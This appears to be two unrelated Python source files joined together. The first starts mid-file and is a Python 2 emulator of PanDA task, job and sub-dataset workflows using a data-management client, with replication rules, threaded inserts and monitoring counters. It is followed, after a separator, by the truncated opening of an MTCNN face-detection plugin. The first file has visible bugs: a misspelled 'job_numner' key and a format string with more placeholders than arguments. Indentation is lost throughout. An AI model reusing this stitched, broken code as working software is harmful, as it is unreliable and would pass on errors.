if computing_rse not in used_rses.keys():
used_rses[computing_rse] = list()
used_rses[computing_rse].append((id, temp_job_count))
inserts_dis.append({'scope': 'Manure', 'name': dis_ds, 'lifetime': 172800,
'rules': [{'account': 'panda', 'copies': 1, 'rse_expression': computing_rse, 'grouping': 'DATASET'}],
'dids': files_in_ds}) # Create DIS-Datasets
monitor.record_counter('panda.tasks.%s.dis_datasets' % task_type, 1) # Reports the creation of a dis dataset for the given task type
monitor.record_counter('panda.tasks.%s.dis_files' % task_type, len(files_in_ds)) # Reports the number of files in the dis - dataset
computing_rse = None
else: # No Dis created, protect files by rules from deletion
if task_type.startswith('prod'): # T1 job, single RSE
if input_ds_used: # Create rules to protect replicas from deletion
with monitor.record_timer_block(['panda.add_replication_rule', ('panda.add_replication_rule.normalized', len(files))]):
client.add_replication_rule(files, copies=1, rse_expression=target_rses[0],
grouping='NONE', account='panda', lifetime=172800)
temp_job_count = int(float(len(files)) / input['number_of_inputfiles_per_job'])
temp_job_count = int(temp_job_count) + 1 if (temp_job_count % 1) != 0 else int(temp_job_count)
used_rses[target_rses[0]] = [(None, temp_job_count)]
else: # User or Group, each out-ds on different RSE
fpd = float(len(files)) / output_datasets_per_datatype
if (fpd % 1) != 0:
fpd = int(fpd) + 1
for i in range(int(output_datasets_per_datatype)):
files_in_ds = []
start = int(i * fpd) if ((i * fpd) < len(files)) else int(len(files) - fpd)
end = int(start + fpd) if (start + fpd) < len(files) else len(files)
try:
files_in_ds = [files[f] for f in range(start, end)]
except IndexError:
print '== PanDA Warning: Missing proper number of files per out-DS (%s - %s (%s))' % (start, end, len(files))
if not len(files_in_ds):
break
computing_rse = target_rses[i]
if input_ds_used: # Create rules to protect replicas from deletion
with monitor.record_timer_block(['panda.add_replication_rule', ('panda.add_replication_rule.normalized', len(files_in_ds))]):
client.add_replication_rule(files_in_ds, copies=1, rse_expression=computing_rse,
grouping='NONE', account='panda', lifetime=172800)
temp_job_count = int(float(len(files_in_ds)) / input['number_of_inputfiles_per_job']) + 1
if computing_rse not in used_rses.keys():
used_rses[computing_rse] = list()
used_rses[computing_rse].append((None, temp_job_count))
computing_rse = None
for computing_rse in used_rses:
for temp in used_rses[computing_rse]:
jobs.append((output['scope'], final_dss, int(temp[1]), computing_rse))
# -------------------------------------- Perform bulk inserts ----------------------------------------
ts = list()
ts_res = Queue()
for ds in inserts_dis:
if threads:
t = threading.Thread(target=self.add_files_ds, kwargs={'client': client, 'ds': ds, 'ret': ts_res, 'sem': sem})
t.start()
ts.append(t)
else:
self.add_files_ds(client, ds)
if threads:
for t in ts:
t.join()
while not ts_res.empty():
ret = ts_res.get()
if not ret[0]:
print ret[1][2]
raise ret[1][0]
# --------------------------------------- Calculate finishing times ----------------------------------
job_finish = [] # When each job finishes -> register output files(s)
# When jobs are finished for dataset
sub_finish = dict()
max_completion = 0
job_number = 0
for job_set in jobs:
# job_set: (scope, [target datasets], number of jobs, computing_rse, task_type, log_ds)
dis_completion = time.time()
if create_dis_ds:
dis_completion += gauss(**file_transfer_duration) # Determines the time it takes to move all files to the target RSE
# Determine the finishing time of each job using again a gaussian distribution
max_target_completion = 0
temp = float(job_set[2]) / output_datasets_per_datatype
temp = int(temp) + 1 if (temp % 1 != 0) else int(temp)
for i in xrange(temp):
job_completion = dis_completion + gauss(**output['duration_job'])
if job_completion > max_target_completion:
max_target_completion = job_completion
job_number += 1
job_finish.append((float(job_completion), {'scope': job_set[0], 'targets': job_set[1], 'computing_rse': job_set[3],
'task_type': task_type, 'log_ds': log_ds, 'task_type_id': task_type_id,
'task_number': task_number, 'job_number': '%06d' % job_number}))
# Remeber last access to target dataset
max_target_completion += safety_delay
for dsn in job_set[1]:
if (dsn not in sub_finish.keys()) or (sub_finish[dsn][0] < max_target_completion):
for fin_ds in final_dss:
if dsn.endswith(fin_ds):
sub_finish[dsn] = (float(max_target_completion), {'source': {'scope': job_set[0], 'name': dsn}, 'target': {'scope': output['scope'], 'name': fin_ds}, 'task_type': task_type})
# Update task completion
if max_completion < max_target_completion:
max_completion = max_target_completion
max_completion += safety_delay # Note: Triggers FINISH_TASK some time later to avoid conflicts if job is stuck in gearman queue
if create_sub_ds:
max_completion += gauss(**file_transfer_duration)
else:
sub_finish = {} # Empty list of sub datasets to avoid data moving when task is finished
task_finish = (float(max_completion), {'scope': output['scope'], 'targets': final_dss, 'task_type': task_type, 'log_ds': log_ds})
monitor.record_counter('panda.tasks.%s.dispatched' % task_type, 1) # Reports the task type which is dipsatched
monitor.record_counter('panda.tasks.%s.number_job' % task_type, len(job_finish) * output_datasets_per_datatype) # Reports the number of jobs spawned from the given task
print '== PanDA: Create %s task with %s files (%s repl.) with output scope %s (dis: %s / sub: %s (%s)/ log_ds: %s / out_ds: %s / jobs: %s (%s))' % (task_type, len(files), len(replicas),
output['scope'], len(inserts_dis),
len(inserts_sub), len(sub_finish), log_ds,
final_dss, job_count, len(job_finish) * output_datasets_per_datatype)
# print '-', job_finish
# print '-', sub_finish
# print '-', task_finish
return {'jobs': job_finish, 'subs': sub_finish.values(), 'task': task_finish}
def add_files_ds(self, client, ds, ret=None, sem=None):
print '+' * 100
print ds
print '+' * 100
if not client:
client = Client(account='panda')
success = False
retry = 1
for rule in ds['rules']:
while not success:
try:
if sem:
sem.acquire()
with monitor.record_timer_block(['panda.client.add_replication_rule', ('panda.client.add_replication_rule.normalized', len(ds['dids']))]):
bla = client.add_replication_rule(dids=ds['dids'], rse_expression=rule['rse_expression'], account=rule['account'], copies=rule['copies'], lifetime=172800)
print bla
success = True
except (DatabaseException, ConnectionError):
e = sys.exc_info()
monitor.record_counter('panda.retry.add_files_to_dataset.%s' % (retry), 1)
retry += 1
if retry > 5:
if ret:
ret.put((False, e))
return
else:
print e
raise
print '== PanDA Warning [%s]: Failed %s times when adding files to dataset (%s:%s). Will retry in 5 seconds.' % (time.strftime('%D %H:%M:%S', time.localtime()), retry, ds['scope'], ds['name'])
time.sleep(randint(1, 2))
except:
e = sys.exc_info()
if ret:
ret.put((False, e))
else:
print e
raise
finally:
if sem:
sem.release()
if ret:
ret.put((True, None))
def CREATE_TASK_input(self, ctx):
try:
# Select input DS from file provided by Cedric using observed age distribution from Thomas
# Select task type
success = False
task_type = ''
while not success:
exit = False
while not exit:
tt = choice(ctx.task_distribution)
exit = (tt.startswith(task_type.split('-')[0]) or (task_type is ''))
# print '== PanDA [%s]: Selecting task from group %s' % (time.strftime('%D %H:%M:%S', time.localtime()), tt.split('-')[0])
task_type = tt
ret = {'input': ctx.tasks[task_type]['input'],
'output': ctx.tasks[task_type]['output'],
'task_type': task_type,
'rses': [ctx.rses[i] for i in sample(xrange(len(ctx.rses)), 20)],
'file_transfer_duration': ctx.file_transfer_duration,
'safety_delay': ctx.safety_delay,
}
if ('meta' in ctx.tasks[task_type]['input'].keys()) and (len(ctx.tasks[task_type]['input']['meta'])): # Task depends on input dataset
ret['input']['dss'] = list()
for i in range(10):
input_ds = self.select_input_ds(task_type, ctx)
if not input_ds:
continue
ret['input']['dss'].append(input_ds)
else: # Task activity is base on max_jobs
ret['input']['dss'] = None
success = True
if task_type.split('.')[0] == 'user':
user = choice(ctx.users)
ret['output']['scope'] = 'user.%s' % user
ret['output']['account'] = user
elif task_type.split('.')[0] == 'group':
group = choice(ctx.groups)
ret['output']['scope'] = 'group.%s' % group
ret['output']['account'] = group
else:
ret['output']['account'] = 'panda'
ret['bulk'] = ctx.bulk == 'True'
if (ctx.threads == 'False') or int(ctx.threads) < 2:
ret['threads'] = None
else:
ret['threads'] = int(ctx.threads)
return ret
except Exception, e:
print e
def CREATE_TASK_output(self, ctx, output):
for key in ['jobs', 'subs', 'task']:
if key not in output.keys():
return
now = time.time()
with ctx.job_queue_mutex:
monitor.record_timer('panda.helper.waiting.job_queue_mutex.sorting', (time.time() - now))
for job in output['jobs']:
with monitor.record_timer_block('panda.helper.sorting_jobs'):
bisect.insort(ctx.job_queue, job)
now = time.time()
with ctx.sub_queue_mutex:
monitor.record_timer('panda.helper.waiting.sub_queue_mutex.sorting', (time.time() - now))
for sub in output['subs']:
with monitor.record_timer_block('panda.helper.sorting_subs'):
bisect.insort(ctx.sub_queue, sub)
if len(output['task']):
now = time.time()
with ctx.task_queue_mutex:
monitor.record_timer('panda.helper.waiting.task_queue_mutex.sorting', (time.time() - now))
with monitor.record_timer_block('panda.helper.sorting_tasks'):
bisect.insort(ctx.task_queue, output['task'])
@UCEmulator.UseCase
def FINISH_JOB(self, jobs, threads):
client = Client(account='panda')
if threads:
sem = threading.BoundedSemaphore(threads)
# Group jobs by sub: if the frequency on the DB should be decreased
ts = list()
ts_res = Queue()
for job in jobs:
if threads:
t = threading.Thread(target=self.register_replica, kwargs={'client': client, 'job': job, 'ret': ts_res, 'sem': sem})
t.start()
ts.append(t)
else:
self.register_replica(client, job)
if threads:
for t in ts:
t.join()
while not ts_res.empty():
ret = ts_res.get()
if ret[0] is False:
print ret[1][2]
raise ret[1][0]
targets = []
replicas = 0
for job in jobs:
targets += job['targets']
replicas += len(job['targets']) if job['log_ds'] else (2 * len(job['targets']))
print '== PanDA [%s]: Registering %s replicas from %s jobs over %s different datasets' % (time.strftime('%D %H:%M:%S', time.localtime()), replicas, len(jobs), len(set(targets)))
def register_replica(self, client, job, ret=None, sem=None):
if not client:
client = Client(account='panda')
count = 0
# TODO: Instead of this loop the attach_dids_to_dids method should be used
attachments = list()
for tds in job['targets']:
# Create output files of the job
out_name = '%s.%s._%s.pool.root.1' % (job['task_type_id'], job['task_number'], job['job_numner'])
log_name = 'log.%s.%s._%s.job.log.tgz.1' % (job['task_number'], job['job_numner'])
files = list()
if not job['log_ds']: # Add log file for each datatype if task doesn't have LOG dataset
files.append({'scope': job['scope'], 'name': out_name, 'bytes': 12345L, 'adler32': '0cc737eb', 'meta': {'guid': str(uuid())}})
files.append({'scope': job['scope'], 'name': log_name, 'bytes': 12345L, 'adler32': '0cc737eb', 'meta': {'guid': str(uuid())}})
else:
fn = out_name if tds.split('.')[-2] != 'log' else log_name
files.append({'scope': job['scope'], 'name': fn, 'bytes': 12345L, 'adler32': '0cc737eb', 'meta': {'guid': str(uuid())}})
attachments.append({'scope': job['scope'], 'name': tds, 'rse': job['computing_rse'], 'dids': files})
count += len(files)
success = False
retry = 1
e = None
now = time.time()
while not success:
try:
if sem:
sem.acquire()
with monitor.record_timer_block('panda.attach_dids_to_dids'):
client.attach_dids_to_dids(attachments=attachments)
success = True
except DatabaseException:
e = sys.exc_info()
monitor.record_counter('panda.retry.add_files_to_dataset.%s' % (retry), 1)
retry += 1
if retry > 5:
break
print '== PanDA Warning: Failed %s times when adding files to datasets: %s' % (retry, attachments)
time.sleep(randint(1, 2))
except:
e = sys.exc_info()
break
finally:
if sem:
sem.release()
if not success:
print '-' * 80
print '- Failed after %s seconds (retries: %s)' % ((time.time() - now), retry)
print '- %s:%s' % (job['scope'], tds)
print '-', files
print '-', job['log_ds']
print '-', e
print '-', count
print '-' * 80
if ret:
ret.put((False, e))
monitor.record_counter('panda.tasks.%s.replicas' % job['task_type'], count) # Reports the creation of a new replica (including log files) fof the given task type
print '== PanDA: Job (%s) added %s files to %s datasets (%s:%s)' % (job['task_type'], count, len(job['targets']), job['scope'], job['targets'])
if ret:
ret.put((True, count))
def FINISH_JOB_input(self, ctx):
ctx.job_print += 1
if not len(ctx.job_queue):
if not ctx.job_print % 100:
print '== PanDA [%s]: No jobs scheduled so far.' % (time.strftime('%D %H:%M:%S', time.localtime()))
return None
jobs = []
if ctx.job_queue_select.acquire(False): # Check if there is already one thread waiting to select items from queue
now = time.time()
with ctx.job_queue_mutex:
monitor.record_timer('panda.helper.waiting.job_queue_mutex.selecting', (time.time() - now))
now = time.time()
tmp_cnt = 0
with monitor.record_timer_block('panda.helper.selecting_jobs'):
for job in ctx.job_queue:
tmp_cnt += 1
if job[0] < now:
jobs.append(job[1])
else:
if not len(jobs):
ctx.job_queue = sorted(ctx.job_queue, key=lambda job: job[0])
break
del ctx.job_queue[0:len(jobs)]
ctx.job_queue_select.release()
else:
print '== PanDA [%s]: Already one thread waiting for pending jobs.' % (time.strftime('%D %H:%M:%S', time.localtime()))
if (ctx.threads == 'False') or int(ctx.threads) < 2:
threads = None
else:
threads = int(ctx.threads)
if len(jobs):
print '== PanDA [%s]: Finishing %s jobs.' % (time.strftime('%D %H:%M:%S', time.localtime()), len(jobs))
monitor.record_counter('panda.helper.jobs_block', len(jobs))
return {'jobs': jobs, 'threads': threads}
else:
if not ctx.job_print % 100:
print '== PanDA [%s]: Next job finishes in %.1f minutes (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), ((ctx.job_queue[0][0] - now) / 60), time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[0][0])))
return None
@UCEmulator.UseCase
def POPULATE_SUB(self, subs, threads, safety_delay):
client = Client(account='panda')
ts = list()
ts_res = Queue()
if threads:
sem = threading.BoundedSemaphore(threads)
for sub in subs:
print sub
print '== PanDA [%s]: Populating SUB-DS (%s) to target (%s) for job %s' % (time.strftime('%D %H:%M:%S', time.localtime()), sub['source'], sub['target'], sub['task_type'])
if threads:
t = threading.Thread(target=self.aggregate_output, kwargs={'client': client, 'source': sub['source'], 'target': sub['target'],
'task_type': sub['task_type'], 'ret': ts_res, 'sem': sem})
t.start()
ts.append(t)
else:
self.aggregate_output(client, sub['source'], sub['target'], sub['task_type'])
if threads:
for t in ts:
t.join()
while not ts_res.empty():
ret = ts_res.get()
if not ret[0]:
print ret[1][2]
raise ret[1][0]
def POPULATE_SUB_input(self, ctx):
ctx.sub_print += 1
if not len(ctx.sub_queue):
if not ctx.sub_print % 100:
print '== PanDA [%s]: No subs scheduled so far.' % (time.strftime('%D %H:%M:%S', time.localtime()))
return None
subs = []
if ctx.sub_queue_select.acquire(False): # Check if there is already one thread waiting to select items from queue
now = time.time()
with ctx.sub_queue_mutex:
monitor.record_timer('panda.helper.waiting.sub_queue_mutex.selecting', (time.time() - now))
now = time.time()
with monitor.record_timer_block('panda.helper.selecting_subs'):
for sub in ctx.sub_queue:
if sub[0] < now:
subs.append(sub[1])
else:
if not len(subs):
ctx.sub_queue = sorted(ctx.sub_queue, key=lambda sub: sub[0])
break
del ctx.sub_queue[0:len(subs)]
ctx.sub_queue_select.release()
if (ctx.threads == 'False') or int(ctx.threads) < 2:
threads = None
else:
threads = int(ctx.threads)
if len(subs):
monitor.record_counter('panda.helper.subs_block', len(subs))
return {'subs': subs, 'threads': threads, 'safety_delay': ctx.safety_delay}
else:
if not ctx.sub_print % 100:
print '== PanDA [%s]: Next sub datset is populated in %.1f minutes (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), ((ctx.sub_queue[0][0] - now) / 60), time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[0][0])))
return None
def aggregate_output(self, client, source, target, task_type, ret=None, sem=None):
now = time.time()
if not client:
client = Client(account='panda')
retry = 1
fs = list()
exc = None
# List files in SUB
while not len(fs):
try:
with monitor.record_timer_block('panda.list_files'):
fs = [f for f in client.list_files(**source)]
if len(fs):
monitor.record_timer('panda.list_files.normalized', (time.time() - now) / len(fs))
monitor.record_counter('panda.tasks.%s.sub_files' % task_type, len(fs))
print '== PanDA [%s]: Adding %s files from SUB (%s) to TID (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(fs), source, target)
else:
print '== PanDA Warning [%s]: No data task arrived for %s. Will Retry later.' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
retry += 1
if retry > 5:
print '== PanDA Warning [%s]: No data task arrived for %s. Gave up' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
monitor.record_counter('panda.tasks.%s.EmptySubDataset' % task_type, 1)
with monitor.record_timer_block('panda.close'):
client.close(**source)
return
time.sleep(randint(3, 5))
except DatabaseException:
exc = sys.exc_info()
fs = []
print '== PanDA [%s]: Waiting 5 seconds for task data to arrive in %s (retry count: %s / task-type: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), source, retry, task_type)
monitor.record_counter('panda.retry.list_files.%s' % (retry), 1)
retry += 1
if retry > 5:
print '== PanDA [%s]: No data task arrived for %s. Gave up' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
monitor.record_counter('panda.tasks.%s.EmptySubDataset' % task_type, 1)
with monitor.record_timer_block('panda.close'):
client.close(**source)
if ret:
ret.put((False, exc))
return
time.sleep(randint(1, 2))
except Exception:
exc = sys.exc_info()
if ret:
ret.put((False, exc))
else:
raise
# Append files to TID
try:
if sem:
sem.acquire()
success = False
retry = 1
while not success:
with monitor.record_timer_block(['panda.add_files_to_dataset', ('panda.add_files_to_dataset.normalized', len(fs))]):
client.add_files_to_dataset(scope=target['scope'], name=target['name'], files=fs)
success = True
except Exception:
exc = sys.exc_info()
print '== PanDA: Waiting 5 seconds for task data to arrive in %s (retry count: %s / task-type: %s)' % (source, retry, task_type)
monitor.record_counter('panda.retry.add_files_to_dataset.%s' % (retry), 1)
retry += 1
if retry > 5:
if ret:
ret.put((False, exc))
return
finally:
if sem:
sem.release()
print '== PanDA [%s]: Populated %s files from %s to %s' % (time.strftime('%D %H:%M:%S', time.localtime()), len(fs), source, target)
# Close SUB dataset
try:
if sem:
sem.acquire()
success = False
retry = 1
while not success:
with monitor.record_timer_block('panda.close'):
client.close(**source)
success = True
except Exception:
exc = sys.exc_info()
print '== PanDA: Waiting 5 seconds for task data to arrive in %s (retry count: %s / task-type: %s)' % (source, retry, task_type)
monitor.record_counter('panda.retry.close.%s' % (retry), 1)
retry += 1
if retry > 5:
if ret:
ret.put((False, exc))
return
finally:
if sem:
sem.release()
print '== PanDA [%s]: Closed sub dataset: %s' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
if ret:
ret.put((True, None))
def FINISH_TASK(self, tasks, threads, safety_delay):
client = Client(account='panda')
for task in tasks:
task_type = task['task_type']
for target in task['targets']:
retry = 1
success = False
while not success:
try:
now = time.time()
with monitor.record_timer_block('panda.list_files'):
fs = [f for f in client.list_files(scope=task['scope'], name=target)]
if len(fs):
monitor.record_timer('panda.list_files.normalized', (time.time() - now) / len(fs))
monitor.record_counter('panda.tasks.%s.output_ds_size' % task_type, len(fs)) # Reports the number of files added to the output dataset
else:
monitor.record_counter('panda.tasks.%s.EmptyOutputDataset' % task_type, 1)
success = True
except DatabaseException:
monitor.record_counter('panda.retry.close.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
print '== PanDA Warning [%s]: Failed %s times to list files in dataset (%s:%s). Will rertry in 5 seconds.' % (time.strftime('%D %H:%M:%S', time.localtime()), retry, task['scope'], target)
time.sleep(randint(1, 2))
except Exception:
e = sys.exc_info()
print '-' * 80
print '- Failed listing files in TID: %s:%s' % (task['scope'], target)
print '-', e
print '-' * 80
raise
retry = 1
success = False
while not success:
try:
with monitor.record_timer_block('panda.close'):
client.close(scope=task['scope'], name=target)
success = True
except UnsupportedOperation:
break
except DatabaseException:
monitor.record_counter('panda.retry.close.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
print '== PanDA Warning: Failed %s times to close the dataset (%s:%s). Will rertry in 5 seconds.' % (retry, task['scope'], target)
time.sleep(randint(1, 2))
print '== PanDA [%s]: Closed output dataset %s:%s from task (%s) including %s files' % (time.strftime('%D %H:%M:%S', time.localtime()), task['scope'], target, task_type, len(fs))
monitor.record_counter('panda.tasks.%s.finished' % task_type, 1)
def FINISH_TASK_input(self, ctx):
ctx.task_print += 1
if not len(ctx.task_queue):
if not ctx.task_print % 100:
print '== PanDA [%s]: No tasks scheduled so far.' % (time.strftime('%D %H:%M:%S', time.localtime()))
return None
tasks = []
if ctx.task_queue_select.acquire(False): # Check if there is already one thread waiting to select items from queue
now = time.time()
with ctx.task_queue_mutex:
monitor.record_timer('panda.helper.waiting.task_queue_mutex.selecting', (time.time() - now))
now = time.time()
with monitor.record_timer_block('panda.helper.selecting_tasks'):
for task in ctx.task_queue:
if task[0] < now:
tasks.append(task[1])
else:
if not len(tasks):
ctx.task_queue = sorted(ctx.task_queue, key=lambda task: task[0])
break
del ctx.task_queue[0:len(tasks)]
ctx.task_queue_select.release()
if (ctx.threads == 'False') or int(ctx.threads) < 2:
threads = None
else:
threads = int(ctx.threads)
if len(tasks):
# print '== PanDA [%s]: Finishing %s tasks.' % (time.strftime('%D %H:%M:%S', time.localtime()), len(tasks))
monitor.record_counter('panda.helper.tasks_block', len(tasks))
return {'tasks': tasks, 'threads': threads, 'safety_delay': ctx.safety_delay}
else:
if not ctx.task_print % 100:
print '== PanDA [%s]: Next task is finsihed in %.1f minutes (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), ((ctx.task_queue[0][0] - now) / 60), time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[0][0])))
return None
def RESET_input(self, ctx):
print '== PanDA [%s]: Reseting input files cache' % time.strftime('%D %H:%M:%S', time.localtime())
monitor.record_counter('panda.tasks.reset', 1)
ctx.input_files = {}
return None
def RESET(self):
pass # Will never be executed, only here for sematic reasons
def QUEUE_OBSERVER(self):
pass # Will never be executed, only here for sematic reasons
def QUEUE_OBSERVER_input(self, ctx):
monitor.record_gauge('panda.tasks.queue', len(ctx.task_queue))
monitor.record_gauge('panda.jobs.queue', len(ctx.job_queue))
monitor.record_gauge('panda.subs.queue', len(ctx.sub_queue))
print '== PanDA [%s]: Task-Queue: %s / Job-Queue: %s / Sub-Queue: %s' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.task_queue), len(ctx.job_queue), len(ctx.sub_queue))
tmp_str = 'Job Queue\n'
tmp_str += '---------\n'
if len(ctx.job_queue) > 11:
for i in range(10):
tmp_str += '\t%s: %s\n' % (i, time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[i][0])))
tmp_str += '---------'
print tmp_str
return None # Indicates that no further action is required
def setup(self, ctx):
"""
Sets up shared information/objects between the use cases and creates between one
and ten empty datasets for the UC_TZ_REGISTER_APPEND use case.
:param cfg: the context of etc/emulation.cfg
"""
# As long as there is no database filler, one dataset and n files are created here
ctx.job_queue = []
ctx.job_queue_mutex = threading.Lock()
ctx.job_queue_select = threading.Lock()
ctx.job_print = 0
ctx.sub_queue = []
ctx.sub_queue_mutex = threading.Lock()
ctx.sub_queue_select = threading.Lock()
ctx.sub_print = 0
ctx.task_queue = []
ctx.task_queue_mutex = threading.Lock()
ctx.task_queue_select = threading.Lock()
ctx.task_print = 0
try:
print '== PanDA [%s]: Loading context file' % (time.strftime('%D %H:%M:%S', time.localtime()))
with open('/data/emulator/panda.ctx', 'r') as f:
stuff = pickle.load(f)
delta = (time.time() - stuff[0]) + 135 # safety
print '== PanDA [%s]: Start importing previous context (written at: %s / delta: %.2f min)' % (time.strftime('%D %H:%M:%S', time.localtime()),
time.strftime('%D %H:%M:%S', time.localtime(stuff[0])), (delta / 60))
ctx.job_queue = sorted(stuff[1])
for job in ctx.job_queue:
job[0] += delta
print '== PanDA [%s]: Re-imported %s jobs to queue (min: %s / max: %s).' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.job_queue),
time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[0][0])), time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[-1][0])))
ctx.sub_queue = sorted(stuff[2])
for sub in ctx.sub_queue:
sub[0] += delta
print '== PanDA [%s]: Re-imported %s subs to queue (min: %s / max: %s).' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.sub_queue),
time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[0][0])), time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[-1][0])))
ctx.task_queue = sorted(stuff[3])
for task in ctx.task_queue:
task[0] += delta
print '== PanDA [%s]: Re-imported %s tasks to queue (min: %s / max: %s).' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.task_queue),
time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[0][0])), time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[-1][0])))
del stuff
except IOError:
print '== PanDA: No information about former execution found'
except EOFError:
print '== PanDA: Panda context file found, but unable to load it.'
ctx.input_files = {}
client = Client(account='panda')
ctx.users = list()
ctx.groups = list()
for a in client.list_accounts():
if a['type'] == 'USER' and a['account'].startswith('user'):
ctx.users.append(a['account'])
if a['type'] == 'GROUP':
ctx.groups.append(a['account'])
ctx.rses = []
for rse in client.list_rses():
if rse['deterministic']:
ctx.rses.append(rse['rse'])
# TODO: Could be done in a more elegant way I guess
ctx.task_distribution = list()
for task in ctx.tasks:
for i in xrange(ctx.tasks[task]['probability']):
ctx.task_distribution.append(task)
def update_ctx(self, key_chain, value):
ctx = super(UseCaseDefinition, self).update_ctx(key_chain, value)
# Update task distribution
if key_chain[0] == 'tasks' and key_chain[-1] == 'probability':
print '== PanDA: Updating task distribution'
# TODO: Could be done in a more elegant way I guess
task_distribution = list()
for task in ctx.tasks:
for i in xrange(ctx.tasks[task]['probability']):
task_distribution.append(task)
ctx.task_distribution = task_distribution
def select_input_ds(self, task_type, ctx):
dist_prefix = '/data/mounted_hdfs/user/serfon/listdatasets2/'
success = False
retry = 0
while not success:
retry += 1
try:
# Derive dataset age
cluster = random()
i = 0
distr = ctx.input_distribution
for age_cluster in distr:
if cluster < age_cluster[1]:
break
i += 1
if i == 0: # First element
age = randint(0, distr[0][0])
elif i == len(distr): # Last element
age = randint(distr[i - 1][0] + 1, distr[-1][0])
else: # Some in between element
age = randint(distr[i - 1][0] + 1, distr[i][0])
# Select random input ds-type
input_ds_type = choice(ctx.tasks[task_type]['input']['meta'])
# Select random dataset from file with according age
date = datetime.date.today() - datetime.timedelta(days=age)
dist_file = '%s/%02d/%02d/listfiles.%s.%s.txt' % (date.year, date.month, date.day, input_ds_type.split('.')[0], input_ds_type.split('.')[1])
path = dist_prefix + dist_file
if dist_file not in ctx.input_files: # File is used for the first time
ctx.input_files[dist_file] = (os.path.getsize(path) / 287)
if ctx.input_files[dist_file] is False: # It is known that this file doen't exists
continue
ds = None
with open(path) as f:
f.seek(randint(0, ctx.input_files[dist_file] - 1) * 287)
ds = f.readline().split()
success = True
except Exception, e:
ctx.input_files[dist_file] = False # Remeber that this file doen't exist
print '!! ERROR !! Can read dataset name from distribution file: %s' % e
if retry > 5:
return 0
return ds
def shutdown(self, ctx):
monitor.record_gauge('panda.tasks.queue', 0)
monitor.record_gauge('panda.jobs.queue', 0)
monitor.record_gauge('panda.subs.queue', 0)
print '== PanDA [%s]: Persisting jobs: %s (first: %s, last: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.job_queue), time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[0][0])),
time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[-1][0])))
print '== PanDA [%s]: Persisting subs: %s (first: %s, last: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.sub_queue), time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[0][0])),
time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[-1][0])))
print '== PanDA [%s]: Persisting tasks: %s (first: %s, last: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.task_queue), time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[0][0])),
time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[-1][0])))
with ctx.job_queue_mutex:
with ctx.sub_queue_mutex:
with ctx.task_queue_mutex:
with open('/data/emulator/panda.ctx', 'w') as f:
pickle.dump([time.time(), ctx.job_queue, ctx.sub_queue, ctx.task_queue], f, pickle.HIGHEST_PROTOCOL)
print '== PanDA [%s]: Persisted context file.' % (time.strftime('%D %H:%M:%S', time.localtime()))
|
mtcnn.py
|
#!/usr/bin/env python3
""" MTCNN Face detection plugin """
from __future__ import absolute_import, division, print_function
import os
from six import string_types, iteritems
import cv2
import numpy as np
from lib.multithreading import MultiThread
from ._base import BoundingBox, Detector, logger
# Must import tensorflow inside the spawned process
# for Windows machines
tf = None # pylint: disable = invalid-name
def import_tensorflow():
""" Import tensorflow from inside spawned process """
global tf # pylint: disable = invalid-name,global-statement
import tensorflow as tflow
tf = tflow
class Detect(Detector):
""" MTCNN detector for face recognition """
def __init__(self, **kwargs):
git_model_id = 2
model_filename = ["mtcnn_det_v1.1.npy", "mtcnn_det_v1.2.npy", "mtcnn_det_v1.3.npy"]
super().__init__(git_model_id=git_model_id, model_filename=model_filename, **kwargs)
self.kwargs = self.validate_kwargs()
self.name = "mtcnn"
self.target = 2073600 # Uses approx 1.30 GB of VRAM
self.vram = 1408
def validate_kwargs(self):
""" Validate that config options are correct. If not reset to default """
valid = True
threshold = [self.config["threshold_1"],
self.config["threshold_2"],
self.config["threshold_3"]]
kwargs = {"minsize": self.config["minsize"],
"threshold": threshold,
"factor": self.config["scalefactor"]}
if kwargs["minsize"] < 10:
valid = False
elif not all(0.0 < threshold <= 1.0 for threshold in kwargs['threshold']):
valid = False
elif not 0.0 < kwargs['factor'] < 1.0:
valid = False
if not valid:
kwargs = {"minsize": 20, # minimum size of face
"threshold": [0.6, 0.7, 0.7], # three steps threshold
"factor": 0.709} # scale factor
logger.warning("Invalid MTCNN options in config. Running with defaults")
logger.debug("Using mtcnn kwargs: %s", kwargs)
return kwargs
def initialize(self, *args, **kwargs):
""" Create the mtcnn detector """
try:
super().initialize(*args, **kwargs)
logger.info("Initializing MTCNN Detector...")
is_gpu = False
# Must import tensorflow inside the spawned process
# for Windows machines
import_tensorflow()
_, vram_free, _ = self.get_vram_free()
mtcnn_graph = tf.Graph()
# Windows machines sometimes misreport available vram, and overuse
# causing OOM. Allow growth fixes that
config = tf.ConfigProto()
config.gpu_options.allow_growth = True # pylint: disable=no-member
with mtcnn_graph.as_default(): # pylint: disable=not-context-manager
